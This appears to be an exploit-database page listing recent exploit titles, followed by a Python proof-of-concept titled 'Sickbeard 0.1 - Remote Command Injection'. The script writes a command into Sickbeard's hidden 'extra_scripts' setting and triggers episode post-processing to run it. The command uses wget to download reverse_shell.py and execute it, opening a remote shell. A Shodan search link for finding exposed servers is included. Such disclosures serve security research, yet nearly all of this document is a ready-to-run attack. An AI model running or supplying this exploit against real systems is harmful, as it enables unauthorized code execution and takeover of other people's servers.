8f6367cf98
8 changes to exploits/shellcodes Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC) Microsoft Windows mshta.exe 2019 - XML External Entity Injection BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC) Sickbeard 0.1 - Remote Command Injection Online Shopping Portal 3.1 - 'email' SQL Injection Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation
72 lines
No EOL
1.8 KiB
Python
Executable file
72 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title: Sickbeard 0.1 - Remote Command Injection
|
|
# Google Dork: https://www.shodan.io/search?query=sickbeard
|
|
# Date: 2020-06-06
|
|
# Exploit Author: bdrake
|
|
# Vendor Homepage: https://sickbeard.com/
|
|
# Software Link: https://github.com/midgetspy/Sick-Beard
|
|
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
|
|
# Tested on: Fedora 32
|
|
# CVE : NA
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import requests
|
|
import sys
|
|
|
|
HOST = 'http://localhost:8081/'
|
|
|
|
# path to local video for processing
|
|
# see HOST + home/postprocess
|
|
PROCESS_DIR = '/directory/changeme'
|
|
|
|
# Auth is disabled on default installation
|
|
USERNAME = ''
|
|
PASSWORD = ''
|
|
|
|
# see "Extra Scripts" field. HOST + config/hidden/
|
|
# multiple commands can be entered separated by '|'
|
|
CMD = 'wget -t 2 -T 1 -O /tmp/reverse_shell.py http://localhost/reverse_shell.py | python /tmp/reverse_shell.py'
|
|
|
|
|
|
def post_request(url, data):
|
|
try:
|
|
requests.post(url=url, data=data, auth=(USERNAME, PASSWORD))
|
|
except requests.exceptions.RequestException as e:
|
|
print(repr(e))
|
|
sys.exit(1)
|
|
|
|
|
|
def set_extra_scripts():
|
|
data = {
|
|
'anon_redirect': 'http://dereferer.org/?',
|
|
'display_all_seasons': 'on',
|
|
'git_path': '',
|
|
'extra_scripts': CMD
|
|
}
|
|
|
|
post_request(HOST+'config/hidden/saveHidden', data)
|
|
|
|
|
|
def process_episode():
|
|
data = {
|
|
'dir': PROCESS_DIR,
|
|
'method': 'Manual',
|
|
'force_replace': 'on'
|
|
}
|
|
|
|
post_request(HOST+'home/postprocess/processEpisode', data)
|
|
|
|
|
|
def main():
|
|
try:
|
|
print('setting scripts...')
|
|
set_extra_scripts()
|
|
|
|
print('processing episode. might take a few seconds...')
|
|
process_episode()
|
|
except KeyboardInterrupt:
|
|
print('exit...')
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main() |